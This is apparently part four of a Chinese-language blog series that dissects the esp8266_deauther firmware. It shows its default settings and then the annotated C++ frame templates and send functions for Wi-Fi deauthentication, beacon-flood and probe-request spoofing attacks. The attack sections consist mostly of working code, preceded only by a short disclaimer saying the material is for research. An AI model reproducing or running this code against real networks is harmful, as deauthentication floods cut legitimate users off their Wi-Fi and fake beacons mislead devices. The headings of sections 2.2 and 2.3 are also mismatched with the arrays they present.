esp8266_deauther第四篇

这一系列的文章仅作技术研究,请遵守相关法律(中华人民共和国网络安全法),请勿使用相关技术来攻击他人!

1 软件配置方法

1.1 wifi相关配置


这一部分的配置在wifi.h文件中,这里规定了web文件的位置,以及wifi的配置。比如登录的ip地址,默认是192.168.4.1,默认的子网掩码是255.255.255.0。


   
   
   
   
  // Server and other global objects
  ESP8266WebServer server(80);            // HTTP server for the web interface, listening on TCP port 80
  DNSServer dnsServer;                    // DNS responder; presumably what drives the captive portal — confirm in wifi.h
  IPAddress apIP(192, 168, 4, 1);         // address the device's own access point answers on
  IPAddress netMsk(255, 255, 255, 0);     // network mask for that access-point subnet
  File fsUploadFile;                      // NOTE(review): name suggests the handle for an in-progress web upload — confirm against the upload handler
  // current WiFi mode and config
  uint8_t wifiMode = WIFI_MODE_OFF;       // radio mode starts as "off" until configured
  bool wifi_config_hidden = false;        // presumably whether the AP hides its SSID — confirm
  bool wifi_config_captivePortal = false; // presumably whether captive-portal redirection is enabled — confirm
  String wifi_config_ssid;                // AP credentials and (presumably) web root; empty until assigned elsewhere
  String wifi_config_password;
  String wifi_config_path;

1.2 核心配置


这一部分的配置在Setting.h中,比如版本号、攻击超时时间、wifi的channel、SSID、password、是否隐藏SSID、语言等。比如登录使用的SSID默认为pwned,密码默认为deauther,默认的语言为英语。本来想做一个汉化包进去方便中国爱好者使用,后来发现在V2.1中,已经加入了中文语言包。V2.1web页面支持的语言包括:cn中文、cs捷克语、de德语、en英语、es西班牙语、fi芬兰语、fr法语、it意大利语、ro罗马尼亚语、ru俄语、tlh克林贡语。


   
   
   
   
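  // Settings fields with their compiled-in defaults. The enclosing class header is not shown here;
  // comments describe only what these initialisers establish.
  bool changed = false;                // presumably "differs from what was last saved" — confirm against the save path
  String version = VERSION;            // build-time version string
  bool beaconChannel = false;
  bool autosave = true;
  bool beaconInterval = false;
  bool cli = true;
  bool displayInterface = USE_DISPLAY; // build-time option
  bool webInterface = true;
  bool webSpiffs = false;
  bool randomTX = false;
  bool ledEnabled = true;
  bool serialEcho = true;
  uint32_t attackTimeout = 600;        // unit not visible here — TODO confirm (seconds?)
  uint32_t autosaveTime = 10000;       // unit not visible here — TODO confirm (milliseconds?)
  uint32_t displayTimeout = 600;
  uint16_t deauthsPerTarget = 20;
  uint16_t chTime = 384;
  uint16_t minDeauths = 3;
  uint8_t forcePackets = 1;
  uint8_t channel = 9;
  uint8_t deauthReason = 1;
  // Initialised to nullptr so a read before assignment is a well-defined null rather than an
  // indeterminate pointer; the original left both uninitialised.
  uint8_t *macSt = nullptr;
  uint8_t *macAP = nullptr;
  uint8_t probesPerSSID = 1;
  String ssid = "pwned";               // default AP SSID — a published project default
  String password = "deauther";        // default AP password — a published project default
  bool hidden = false;
  bool captivePortal = true;
  String lang = "en";                  // web UI language code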

1.3 其他配置
其他的配置涉及一些关键的数据结构,这里没有多做研究。

2 网络攻击核心代码解析 

2.1 deauth攻击

(1)deauth攻击数据包deauthPacket[26]的结构


   
   
   
   
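  // 802.11 deauthentication/disassociation management-frame template (26 bytes).
  // The address fields and the reason-code byte are overwritten at runtime before the frame is sent.
  uint8_t deauthPacket[26] = {
      /*  0 - 1  */ 0xC0, 0x00,                         // type, subtype c0: deauth (a0: disassociate)
      /*  2 - 3  */ 0x00, 0x00,                         // duration (SDK takes care of that)
      /*  4 - 9  */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // receiver (target)
      /* 10 - 15 */ 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // source (ap)
      /* 16 - 21 */ 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // BSSID (ap)
      /* 22 - 23 */ 0x00, 0x00,                         // fragment & sequence number
      /* 24 - 25 */ 0x01, 0x00                          // reason code (1 = unspecified reason)
  };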

(2)deauth攻击核心代码


   
   
   
   
  // Sends deauthentication and disassociation frames for the (apMac, stMac) pair on channel ch.
  // The AP -> station direction is always sent; the station -> AP direction is added only when
  // stMac is not a broadcast address. Returns true when sendPacket() accepted at least one frame;
  // in that case deauth.time is set to currentTime, and deauth.packetCounter is incremented once
  // per accepted frame. Side effect: packetSize and the shared deauthPacket template are modified.
  bool Attack::deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_t ch) {
      if (!stMac) return false; // no station address to put in the frame

      packetSize = sizeof(deauthPacket);
      deauthPacket[24] = reason;

      // Write the addresses into the shared template: receiver at [4], source and BSSID at [10]/[16].
      auto setAddresses = [&](const uint8_t* receiver, const uint8_t* sender) {
          memcpy(&deauthPacket[4], receiver, 6);
          memcpy(&deauthPacket[10], sender, 6);
          memcpy(&deauthPacket[16], sender, 6);
      };

      // Set the subtype byte, hand the frame to the SDK and count it if it was accepted.
      auto transmit = [&](uint8_t subtype) -> bool {
          deauthPacket[0] = subtype;
          if (!sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) return false;
          deauth.packetCounter++;
          return true;
      };

      bool anySent = false;

      // AP -> station: deauth (0xc0), then disassociate (0xa0)
      setAddresses(stMac, apMac);
      anySent |= transmit(0xc0);
      anySent |= transmit(0xa0);

      // station -> AP, skipped when the station address is a broadcast address
      if (!macBroadcast(stMac)) {
          setAddresses(apMac, stMac);
          anySent |= transmit(0xc0);
          anySent |= transmit(0xa0);
      }

      if (anySent) deauth.time = currentTime;
      return anySent;
  }

2.2 beacon攻击

(1)beacon攻击数据包beaconPacket[68]的结构(注:下面列出的数组实际是probePacket[68];beaconPacket[109]的数组列在2.3节)


   
   
   
   
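  // 802.11 probe-request frame template (68 bytes). The source address at [10..15] and the
  // SSID field at [26..57] are overwritten at runtime before the frame is sent.
  uint8_t probePacket[68] = {
      /*  0 - 1  */ 0x40, 0x00,                         // Type: Probe Request
      /*  2 - 3  */ 0x00, 0x00,                         // Duration: 0 microseconds
      /*  4 - 9  */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // Destination: Broadcast
      /* 10 - 15 */ 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, // Source: random MAC
      /* 16 - 21 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // BSS Id: Broadcast
      /* 22 - 23 */ 0x00, 0x00,                         // Sequence number (will be replaced by the SDK)
      /* 24 - 25 */ 0x00, 0x20,                         // Tag: SSID, Tag length: 32
      /* 26 - 57 */ 0x20, 0x20, 0x20, 0x20,             // SSID (32 bytes of space, replaced at runtime)
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
      /* 58 - 59 */ 0x01, 0x08,                         // Tag Number: Supported Rates (1), Tag length: 8
      /* 60 */ 0x82, // 1(B)
      /* 61 */ 0x84, // 2(B)
      /* 62 */ 0x8b, // 5.5(B)
      /* 63 */ 0x96, // 11(B)
      /* 64 */ 0x24, // 18
      /* 65 */ 0x30, // 24
      /* 66 */ 0x48, // 36
      /* 67 */ 0x6c  // 54
  };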

(2)beacon攻击核心代码


   
   
   
   
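  // Transmits one beacon frame advertising `ssid` from `mac` on channel `ch`.
  // beaconPacket is a 109-byte template with a 32-byte SSID field; the frame actually sent is
  // assembled in a local buffer with the SSID field shortened to the real length (at most 32).
  // When wpa2 is false the capability byte becomes 0x21 and the 26-byte RSN element at the end
  // of the template is left out; when true the byte is 0x31 and the RSN element is kept.
  // Returns true when sendPacket() accepted the frame; beacon.time and beacon.packetCounter are
  // updated only in that case. Side effects (unchanged): packetSize and beaconPacket are modified.
  bool Attack::sendBeacon(uint8_t* mac, const char* ssid, uint8_t ch, bool wpa2) {
      packetSize = sizeof(beaconPacket);
      if (wpa2) {
          beaconPacket[34] = 0x31;
      } else {
          beaconPacket[34] = 0x21;
          packetSize -= 26;
      }

      int ssidLen = strlen(ssid);
      if (ssidLen > 32) ssidLen = 32;

      memcpy(&beaconPacket[10], mac, 6);
      memcpy(&beaconPacket[16], mac, 6);
      memcpy(&beaconPacket[38], ssid, ssidLen);
      beaconPacket[82] = ch;

      // Assemble the outgoing frame in a fixed-size local buffer. Its length,
      // (packetSize - 32) + ssidLen, never exceeds sizeof(beaconPacket) because ssidLen <= 32,
      // so no heap allocation is needed. The previous version allocated with new[] and released
      // with plain delete, which is undefined behaviour.
      uint8_t frame[sizeof(beaconPacket)];
      uint16_t frameSize = (packetSize - 32) + ssidLen;
      memcpy(&frame[0], &beaconPacket[0], 38 + ssidLen);                // header through SSID bytes
      frame[37] = ssidLen;                                              // SSID tag length = real length
      memcpy(&frame[38 + ssidLen], &beaconPacket[70], wpa2 ? 39 : 13);  // rates + channel (+ RSN when wpa2)

      if (!sendPacket(frame, frameSize, ch, settings.getForcePackets())) return false;
      beacon.time = currentTime;
      beacon.packetCounter++;
      return true;
  }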

2.3 probe攻击

(1)probe攻击数据包probePacket[109]的结构(注:下面列出的数组实际是beaconPacket[109];probePacket[68]的数组列在2.2节)


   
   
   
   
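  // 802.11 beacon frame template (109 bytes). At runtime the source/BSSID addresses at [10]/[16],
  // the capability byte at [34], the SSID field at [38..69] and the channel byte at [82] are
  // overwritten before the frame is sent.
  uint8_t beaconPacket[109] = {
      /*  0 - 3  */ 0x80, 0x00, 0x00, 0x00,             // Type/Subtype: management beacon frame
      /*  4 - 9  */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // Destination: broadcast
      /* 10 - 15 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // Source
      /* 16 - 21 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // BSSID (same value as Source)
      // Fixed parameters
      /* 22 - 23 */ 0x00, 0x00,                         // Fragment & sequence number (will be done by the SDK)
      /* 24 - 31 */ 0x83, 0x51, 0xf7, 0x8f, 0x0f, 0x00, 0x00, 0x00, // Timestamp
      /* 32 - 33 */ 0xe8, 0x03,                         // Interval: 0x64, 0x00 => every 100ms - 0xe8, 0x03 => every 1s
      /* 34 - 35 */ 0x31, 0x00,                         // capabilities information
      // Tagged parameters
      // SSID parameters
      /* 36 - 37 */ 0x00, 0x20,                         // Tag: SSID, Tag length: 32
      /* 38 - 69 */ 0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,             // SSID
      // Supported Rates
      /* 70 - 71 */ 0x01, 0x08,                         // Tag: Supported Rates, Tag length: 8
      /* 72 */ 0x82, // 1(B)
      /* 73 */ 0x84, // 2(B)
      /* 74 */ 0x8b, // 5.5(B)
      /* 75 */ 0x96, // 11(B)
      /* 76 */ 0x24, // 18
      /* 77 */ 0x30, // 24
      /* 78 */ 0x48, // 36
      /* 79 */ 0x6c, // 54
      // Current Channel
      /* 80 - 81 */ 0x03, 0x01,                         // Channel set, length
      /* 82 */ 0x01,                                    // Current Channel
      // RSN information (26 bytes; dropped when the frame is sent without wpa2)
      /* 83 - 84 */ 0x30, 0x18,
      /* 85 - 86 */ 0x01, 0x00,
      /* 87 - 90 */ 0x00, 0x0f, 0xac, 0x02,
      /* 91 - 92 */ 0x02, 0x00,
      /* 93 - 100 */ 0x00, 0x0f, 0xac, 0x04, 0x00, 0x0f, 0xac, 0x04, /* Fix: changed 0x02 (TKIP) to 0x04 (CCMP), the default; WPA2 with TKIP is not supported by many devices */
      /* 101 - 102 */ 0x01, 0x00,
      /* 103 - 106 */ 0x00, 0x0f, 0xac, 0x02,
      /* 107 - 108 */ 0x00, 0x00
  };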

(2)probe攻击核心代码


   
   
   
   
  // Transmits one probe request for `ssid` with `mac` as the source address on channel `ch`.
  // The SSID is copied into the template's 32-byte SSID field, truncated to 32 bytes; the field
  // is not cleared first, so bytes past the new SSID keep their previous contents.
  // Returns true when sendPacket() accepted the frame; probe.time and probe.packetCounter are
  // updated only in that case. Side effect: packetSize and probePacket are modified.
  bool Attack::sendProbe(uint8_t* mac, const char* ssid, uint8_t ch) {
      packetSize = sizeof(probePacket);

      const size_t rawLen = strlen(ssid);
      const int ssidLen = rawLen > 32 ? 32 : static_cast<int>(rawLen);

      memcpy(&probePacket[10], mac, 6);
      memcpy(&probePacket[26], ssid, ssidLen);

      const bool accepted = sendPacket(probePacket, packetSize, ch, settings.getForcePackets());
      if (accepted) {
          probe.time = currentTime;
          ++probe.packetCounter;
      }
      return accepted;
  }
